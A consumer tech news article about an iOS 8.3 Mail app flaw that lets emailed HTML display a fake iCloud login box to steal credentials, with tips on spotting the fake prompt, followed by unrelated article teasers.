Skip to main content

Beware of iCloud login prompts: A new security flaw lets hackers steal your info

iPhone icloud
Apple’s mobile operating system iOS has a reputation for being more secure than Android, but recently, it seems that more hackers are targeting iPhone and iPad users. A GitHub user by the name of Jansouceket discovered yet another iOS vulnerability back in January and reported it to Apple. The friendly hacker demonstrated how an attack code can be used in the Mail app to steal users’ iCloud logins and other sensitive information.

Apparently, ever since Apple released iOS 8.3 in early April, the Mail app has stopped removing potentially dangerous HTML code from the emails users receive. One tag instructs the Mail app to download and execute code remotely. The command then brings up a form box, which mimics the appearance of an iCloud log in request box. If the user logs in, the hacker can then steal his or her iCloud account user name and password. With these two pieces of information, the hacker can steal other personal information stored in iCloud.

Proof-of-concept: iOS 8.3 attack

“This bug allows remote HTML content to be loaded, replacing the content of the original email message,” Jansoucek wrote. “JavaScript is disabled in this UIWebView, but it is still possible to build a functional password ‘collector’ using simple HTML and CSS [cascading style sheets].”

To make matters worse, the vulnerability places a tracking cookie in the Mail app, so that the code doesn’t execute the same command every time the infected email is opened in the app. That way, the user doesn’t get suspicious of the message or notice the link between that specific email and the iCloud login prompt. Additionally, the hacker can change the code at any time to access different information.

Luckily, there is a trick iOS users can employ to protect themselves from the hack. Although the malicious code does a pretty good imitation of the iCloud login box, it isn’t perfect. First off, the box asks for both your Apple ID and your password, while iCloud typically asks for only your password and already displays your user name. Secondly, the box isn’t modal, so the background doesn’t fade and the screen isn’t static when the prompt comes up. Additionally, keyboard suggestions remain activated, which is something that never happens when you receive an iCloud prompt on iOS.

Of course, these differences are subtle, and many won’t notice them. Apple has yet to respond, but hopefully the patch will come soon. Until then, the next time you see an iCloud login request, check for these telltale signs to ensure that you’re not being hacked.

Editors' Recommendations

Malarie Gokey
Former Digital Trends Contributor
As DT's Mobile Editor, Malarie runs the Mobile and Wearables sections, which cover smartphones, tablets, smartwatches, and…
A long-awaited Apple Pay feature is finally on your iPhone
Apple Pay Later

Apple announced Apple Pay Later last year when it revealed iOS 16 at WWDC 2022. The feature is finally rolling out to “randomly selected users” as of today, through a prerelease version of Apple Pay Later in the Wallet app. Those who have access to this prerelease version should have received an email to their Apple ID account, and they will need iOS 16.4 and iPadOS 16.4.

This is a prerelease version of Apple Pay Later, and the full service will be rolling out to eligible iPhone users older than 18 in the U.S. in the “coming months.”

Read more
12 iOS 16.4 features that are about to make your iPhone even better
iPhone 14 Pro Max with an iOS 16.4 icon next to it.

While we wait to get our first look at iOS 17 later this summer, Apple has officially released its latest iOS update in the form of iOS 16.4. This is the fourth major iOS 16 update, and there's a surprising amount of new features and goodies to check out.

Following multiple beta versions over the last few weeks, Apple began rolling out the final build of iOS 16.4 to everyone on March 27, 2023. If you have an iPhone and want to know what's new, here's a look at the 12 biggest iOS 16.4 features you need to check out.
Apple Books brings back the page curl effect

Read more
Your Google One plan just got 2 big security updates to keep you safe online
Two Google Pixel 7 Pro smartphones.

Google just added some major new security features to keep its Google One subscribers safe while on the web. After all, the internet is where you spend a lot of your time, whether that's looking things up, paying bills, shopping, booking appointments, or sharing photos with family and friends. That’s a lot of information, and Google wants to keep subscribers safe from the darker side of the web.

Regardless of whether you use an iPhone or an Android smartphone, all Google One subscribers are getting the following two security features.
VPN by Google One for everyone

Read more